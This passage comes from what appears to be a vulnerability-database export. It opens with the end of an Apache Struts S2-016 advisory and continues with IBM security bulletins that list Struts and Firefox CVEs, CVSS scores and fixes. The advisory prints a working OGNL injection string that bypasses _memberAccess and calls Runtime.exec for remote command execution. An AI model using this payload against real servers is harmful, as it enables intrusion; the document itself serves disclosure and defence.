technique is to use reflection to replace static method call to\n instance method call. Another technique is to overwrite #_memberAccess\n object itself rather than property of the object:\n\n %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),\n @java.lang.Runtime@getRuntime().exec('your commands')}\n\n Probably prevention against static method is just an additional layer\n of defense, but I think that global objects such as #_memberAccess\n should be protected from rogue update.\n\nTimeline:\n 2013/06/24 Reported to Struts Security ML\n 2013/07/17 Vender announced v2.3.15.1\n 2013/08/10 Disclosure of this advisory\n\nRecommendation:\n Immediate upgrade to the latest version is strongly recommended as\n active attacks have already been observed. It should be noted that\n redirect: and redirectAction: parameters were completely dropped and\n do not work in the latest version as stated in the vender's page.\n Thus attention for compatibility issues is required for upgrade.\n\n If you cannot upgrade your Struts2 immediately, filtering (by custom\n servlet filter, IPS, WAF and so on) can be a mitigation solution for\n this vulnerability. Some points about filtering solution are listed\n below.\n\n - Both %{expr} and ${expr} notation can be used for attacks.\n - Parameters both in querystring and in request body can be used.\n - redirect: and redirectAction: can be used not only for Java method\n execution but also for open redirect.\n\n See S2-017 (CVE-2013-2248) for open redirect issue.\n https://struts.apache.org/release/2.3.x/docs/s2-017.html\n\nReference:\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\n https://cwiki.apache.org/confluence/display/WW/ActionMapper", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "ibm": [{"lastseen": "2022-03-14T23:45:43", "description": "## Abstract\n\nIBM Storwize V7000 Unified includes multiple software components for which the vendors have provided fixes for security vulnerabilities in such components.\n\n## Content\n\n**VULNERABILITY DETAILS: ** \n \n**CVE ID:** \n \n\n\n**Vendor **| **Vendor ID**| **Vendor Title**| **Included CVEs** \n---|---|---|--- \nRed Hat| [_RHSA-2013-0981_](<http://rhn.redhat.com/errata/RHSA-2013-0981.html>)| Critical: firefox security update| CVE-2013-1682 \nCVE-2013-1684 \nCVE-2013-1685 \nCVE-2013-1686 \nCVE-2013-1687 \nCVE-2013-1690 \nCVE-2013-1692 \nCVE-2013-1693 \nCVE-2013-1694 \nCVE-2013-1697 \nRed Hat | [_RHSA-2013-0820_](<https://rhn.redhat.com/errata/RHSA-2013-0820.html>)| Critical: firefox security update (May 2013)| CVE-2013-0801 \nCVE-2013-1670 \nCVE-2013-1674 \nCVE-2013-1675 \nCVE-2013-1676 \nCVE-2013-1677 \nCVE-2013-1678 \nCVE-2013-1679 \nCVE-2013-1680 \nCVE-2013-1681 \nIBM | \n| Unauthorized access exposure on IBM Storwize V7000 GUI| CVE-2013-2251 \nCVE-2013-2248 \nCVE-2013-2135 \nCVE-2013-2134 \nCVE-2013-2115 \nCVE-2013-1966 \nCVE-2013-1965 \n \n**DESCRIPTION:** \nIBM Storwize V7000 Unified has integrated updated versions of the software components for which the vendors have provided fixes for security vulnerabilities. Specific details can be found in the Reference section links below. \n \n**CVSS:** \n \n_Red Hat RHSA-2013-0981_ \n \nCVE-2013-1682 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See[ http://xforce.iss.net/xforce/xfdb/85194](<http://xforce.iss.net/xforce/xfdb/85194>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1684 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85254> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1685 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85255> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1686 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85256> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1687 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85257> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1690 \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85259> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:P) \n \nCVE-2013-1692 \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85261> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \nCVE-2013-1693 \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85262> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n \nCVE-2013-1694 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85263> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1697 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/85267> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \n_RHSA-2013-0820_ \n \nCVE-2013-0801 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84252> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1670 \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84254> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \nCVE-2013-1674 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84258> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1675 \nCVSS Base Score: 5.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84259> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n \nCVE-2013-1676 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84260> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1677 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84261> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1678 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84262> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1679 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84263> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1680 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84264> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \nCVE-2013-1681 \nCVSS Base Score: 9.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/84265> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C) \n \n_IBM_ \nBelow vulnerabilities are applicable to IBM Storwize V7000 GUI, and do not affect Storwize V7000 Unified GUI. The vulnerabilities can be exploited by a user with access to the IBM Storwize V7000 management IP interface using vulnerabilities in the Apache Struts component. If successful, the user can gain access with \"superuser\" privilege which will allow any modification to the configuration, including complete deletion. \n \n[_CVE-2013-2251_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2251>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85756_](<http://xforce.iss.net/xforce/xfdb/85756>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[_CVE-2013-2248_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2248>) \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85755_](<http://xforce.iss.net/xforce/xfdb/85755>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) \n \n[_CVE-2013-2135_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2135>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84763_](<http://xforce.iss.net/xforce/xfdb/84763>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[_CVE-2013-2134_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2134>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84762_](<http://xforce.iss.net/xforce/xfdb/84762%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[_CVE-2013-2115_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84543_](<http://xforce.iss.net/xforce/xfdb/84543%20>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[_CVE-2013-1966_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966>) \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/84542_](<http://xforce.iss.net/xforce/xfdb/84542>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n \n[_CVE-2013-1965_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1965>) \nCVSS Base Score: 6.8 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/85573_](<http://xforce.iss.net/xforce/xfdb/85573>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P) \n \n \n**AFFECTED PLATFORMS: **\n\n * **_Affected releases:_** IBM Storwize V7000 Unified 1.3.0.0 through 1.4.1.X.\n * **_Releases/systems/configurations NOT affected:_** IBM Storwize V7000 Unified 1.4.2.0 and above.\n \n\n\n**REMEDIATION: **\n\n \n**_Vendor Fix(es):_** The issues were fixed beginning with version IBM Storwize V7000 Unified 1.4.2.0. IBM Storwize V7000 Unified customers running an earlier version (e.g. IBM Storwize V7000 Unified 1.3.2.0 or 1.4.1.1) must upgrade to IBM Storwize V7000 Unified 1.4.2.0 or a later version in order to get these fixes. \n \n \n**_Workaround(s):_** None. \n \n \n**_Mitigation(s):_** IBM Storwize V7000 Unified is not exposed to CVEs related to Firefox and Xulrunner during normal operation. Service procedures which use the Firefox web browser may activate the vulnerable code. Service personnel must not browse web pages on the internet to avoid the processing of web pages with malicious content. \nTo mitigate \"Unauthorized access exposure on IBM Storwize V7000\", access to the Storwize V7000 management IP interface can be restricted, for example using a private network or firewall technology. Only users with access to the IP interface can exploit the vulnerability related to unauthorized access to Storwize V7000. \n \n**REFERENCES: ** \n\n\n * [_Complete CVSS guide_](<http://www.first.org/cvss/v2/guide>)\n * [_On-line Calculator V2_](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n * [_RHSA-2013-0981_](<http://rhn.redhat.com/errata/RHSA-2013-0981.html>)\n * [_RHSA-2013-0820_](<https://rhn.redhat.com/errata/RHSA-2013-0820.html>)\n \n \n**RELATED INFORMATION: ** \n\n\n * [_IBM Secure Engineering Web Portal_](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>)\n * [_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>)\n \n \n**CHANGE HISTORY: ** \n\n\n * 10/15/2013: Original copy published.\n\n_*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash. _\n\n \n**_Note: _**_According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" _ \n_IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY._\n\n[{\"Product\":{\"code\":\"ST5Q4U\",\"label\":\"IBM Storwize V7000 Unified (2073)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"1.4\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"1.3;1.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-06-18T00:07:17", "type": "ibm", "title": "Security Bulletin: IBM Storwize V7000 Unified Update Includes Fixes for Multiple Vendor Security Vulnerabilities.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0801", "CVE-2013-1670", "CVE-2013-1674", "CVE-2013-1675", "CVE-2013-1676", "CVE-2013-1677", "CVE-2013-1678", "CVE-2013-1679", "CVE-2013-1680", "CVE-2013-1681", "CVE-2013-1682", "CVE-2013-1684", "CVE-2013-1685", "CVE-2013-1686", "CVE-2013-1687", "CVE-2013-1690", "CVE-2013-1692", "CVE-2013-1693", "CVE-2013-1694", "CVE-2013-1697", "CVE-2013-1965", "CVE-2013-1966", "CVE-2013-2115", "CVE-2013-2134", "CVE-2013-2135", "CVE-2013-2248", "CVE-2013-2251"], "modified": "2018-06-18T00:07:17", "id": "E4B17BF9EB94818B3DD67E5BE6300EFD410A818EA54EBAE7A739EFDF92086058", "href": "https://www.ibm.com/support/pages/node/689307", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-28T22:08:45", "description": "## Summary\n\nStruts vulnerabilities affect IBM InfoSphere Information Server. IBM InfoSphere Information Server has addressed the applicable CVEs.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-4430_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4430>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site request forgery, caused by improper validation of user-supplied input. By persuading an authenticated user to visit a malicious Web site, a remote attacker could send a malformed expression to bypass token validation. An attacker could exploit this vulnerability to perform cross-site scripting attacks, Web cache poisoning, and other malicious activities. \nCVSS Base Score: 8.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114185_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114185>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) \n\n**CVEID:** [_CVE-2016-4431_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4431>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the default action method. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass internal security mechanism and redirect the victim to an arbitrary site. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114187_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114187>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4433_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4433>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by an error in the Getter as action method. By sending a specially crafted request, an attacker could exploit this vulnerability to bypass internal security mechanism and redirect the victim to an arbitrary site. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114186_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114186>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4436_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4436>) \n**DESCRIPTION:** An unspecified error Apache Struts related to the method used to clean up action name has an unknown impact and attack vector. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114183_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114183>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [_CVE-2016-4438_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4438>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system. By passing a malicious expression when using the REST Plugin, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114184_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114184>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n**CVEID:** [_CVE-2016-4465_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4465>) \n**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by an error when using a built-in URLValidator. An attacker could exploit this vulnerability to overload the server process. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/114188_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/114188>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [_CVE-2016-0785_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0785>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by a double OGNL evaluation of attribute values. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111513_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111513>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n \n \n**CVEID:** [_CVE-2016-2162_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2162>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the I18NInterceptor. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111515_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111515>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID:** [_CVE-2016-4003_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4003>) \n**DESCRIPTION:** Apache Struts is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the URLDecoder implementation. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base Score: 6.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111514_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111514>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) \n \n**CVEID:** [_CVE-2016-3081_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3081>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 5.6 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112528_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112528>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID:** [_CVE-2016-3082_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3082>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the use of XSLTResult to parse arbitrary stylesheet. An attacker could exploit this vulnerability to inject and execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/112527_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/112527>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n \n**CVEID:** [_CVE-2016-3087_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3087>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the passing of a malicious expression when Dynamic Method Invocation is enabled. An attacker could exploit this vulnerability using the REST Plugin to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113685_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113685>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID:** [_CVE-2016-3093_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3093>) \n**DESCRIPTION:** Apache Struts is vulnerable to a denial of service, caused by the improper implementation of cache used to store method references by the OGNL expression language. An attacker could exploit this vulnerability to block access to a Web site. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113686_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n**CVEID:** [_CVE-2016-1181_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1181>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against unintended remote operations against components on server memory by the ActionForm instance. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 8.1 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113852_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113852>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n**CVEID:** [_CVE-2016-1182_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1182>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to bypass security restrictions, caused by the improper validation of input by the Validator. An attacker could exploit this vulnerability to modify validation rules and error messages. \nCVSS Base Score: 4.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/113853_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/113853>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:L) \n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server: versions 8.5, 8.7, 9.1, 11.3, and 11.5 \nIBM InfoSphere Information Governance Catalog: versions 11.3, and 11.5 \nIBM InfoSphere Metadata Workbench: versions 8.5, 8.7, and 9.1\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \nInfoSphere Information Server, Information Governance Catalog| 11.5| JR56313| \\--Apply IBM InfoSphere Information Server version [_11.5.0.1_](<http://www-01.ibm.com/support/docview.wss?uid=swg24041893>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11501_isf_ru3_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Governance[_ Rollup patch 5_](<http://www-01.ibm.com/support/docview.wss?uid=swg24042914>) \nInfoSphere Information Server, Information Governance Catalog| 11.3| JR56313| \\--Apply IBM InfoSphere Information Server version [_11.3.1.2 _](<http://www-01.ibm.com/support/docview.wss?uid=swg24040138>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11312_isf_ru5_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Governance Catalog [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11312_IGC_ru23_server_client_multi>) \nInfoSphere Information Server, Metadata Workbench| 9.1| JR56313| \\--Apply IBM InfoSphere Information Server version [_9.1.2.0_](<http://www-01.ibm.com/support/docview.wss?uid=swg24035470>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is912_isf_ru11_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Server Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is912_JR56302_MWB_server_engine_client_multi>) \nInfoSphere Information Server, Metadata Workbench| 8.7| JR56313| \\--Apply IBM InfoSphere Information Server version [_8.7 Fix Pack 2_](<http://www-01.ibm.com/support/docview.wss?uid=swg24034359>) \n\\--Apply IBM InfoSphere Information Server Framework [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8702_isf_ru4_services_engine_client_multi>) \n\\--Apply IBM InfoSphere Information Server Metadata Workbench [_Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8702_JR56302_MWB_server_engine_client_multi>) \n \nNote: \n1\\. Some fixes require installing both a fix pack and a subsequent patch. While the fix pack must be installed first, any additional patches required may be installed in any order. \n2\\. For IBM InfoSphere Information Server version 8.5, IBM recommends upgrading to a fixed, supported version/release/platform of the product. \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security 